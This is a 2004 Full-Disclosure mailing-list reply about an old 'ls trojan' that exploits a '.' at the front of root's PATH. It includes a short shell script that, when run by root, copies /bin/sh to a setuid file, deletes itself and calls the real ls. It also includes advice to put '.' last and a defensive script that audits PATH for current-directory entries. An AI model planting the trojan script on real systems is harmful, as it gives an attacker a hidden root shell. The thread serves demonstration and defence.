Re: [Full-Disclosure] Old LS Trojan?
From: Andrew Farmer (andfarm_at_teknovis.com)
To: "David S. Morgan" <email@example.com>
Date: Wed, 1 Dec 2004 14:27:40 -0800
On 01 Dec 2004, at 12:11, David S. Morgan wrote:
> I am looking for an old LS trojan, with trojan being a misnomer.
> Essentially, the scenario is that the admin (root) has a . (dot) in
> his path. The bad-user knows this, and has crafted an LS shell script
> (the part that I can't find) that essentially copies /sbin/sh to a
> hidden directory and then performs some suid majik to make the sh run
> as if they were root, without needing the root password. The file
> then removes itself and does the real version of ls.
> Does anyone remember this one, and have the ls script anywhere? I
> would like to use it in a demonstration. I know that this has
> probably been fixed in various ways, but I have "old Unixes" for just
> such occasions.
Probably something along the lines of:
> [ `whoami` = root ] || exit
> cp /bin/sh /bin/suid-sh
> chmod +s /bin/suid-sh
> rm $0
> exec /bin/ls $*
Note that this would only run if your $PATH _begins_ with '.' - if
you're going to put '.' in your $PATH, put it _last_.
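A defender's check for the precondition Andrew points at, added here as an example and not part of the original thread: a POSIX sh audit of a PATH string that reports every entry the shell would resolve against the current directory (an explicit '.', an empty entry, or any relative path) and says whether the first such entry is searched first, last, or in between. The function names and verdict labels are my own.

```shell
# Audit a PATH string for entries that make the shell search the
# current directory: '.', an empty entry (leading, trailing or doubled
# ':' means cwd in POSIX), or any relative path. Each hit prints as
# "<position>:<entry>:<reason>" so the search order is visible.
path_risk() {
    _rest="$1:"     # trailing ':' so a final empty entry is seen too
    _pos=0
    while [ -n "$_rest" ]; do
        _entry=${_rest%%:*}
        _rest=${_rest#*:}
        _pos=$((_pos + 1))
        case "$_entry" in
            "") _reason="empty entry, POSIX treats it as the current directory" ;;
            .)  _reason="explicit current directory" ;;
            /*) continue ;;
            *)  _reason="relative entry, resolved against the current directory" ;;
        esac
        printf '%s:%s:%s\n' "$_pos" "$_entry" "$_reason"
    done
}

# Number of entries in a PATH string (empty ones count too).
path_len() {
    _rest="$1:"; _n=0
    while [ -n "$_rest" ]; do _rest=${_rest#*:}; _n=$((_n + 1)); done
    echo "$_n"
}

# Where does the first current-directory-style entry sit?
# Prints "none", "first", "last" or "middle". Only "none" is safe;
# "last" merely limits the trick to names that exist nowhere else
# on the PATH (typos, or tools this box does not have).
path_verdict() {
    _line=$(path_risk "$1" | head -n 1)
    if [ -z "$_line" ]; then echo none; return 0; fi
    _pos=${_line%%:*}
    if [ "$_pos" -eq 1 ]; then echo first
    elif [ "$_pos" -eq "$(path_len "$1")" ]; then echo last
    else echo middle
    fi
}

# Usage: audit the live environment of the calling shell.
path_risk "$PATH"
echo "verdict: $(path_verdict "$PATH")"
```

Run it as root and as each admin account, since the trick only needs the victim's PATH, not the attacker's.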
Full-Disclosure - We believe in it.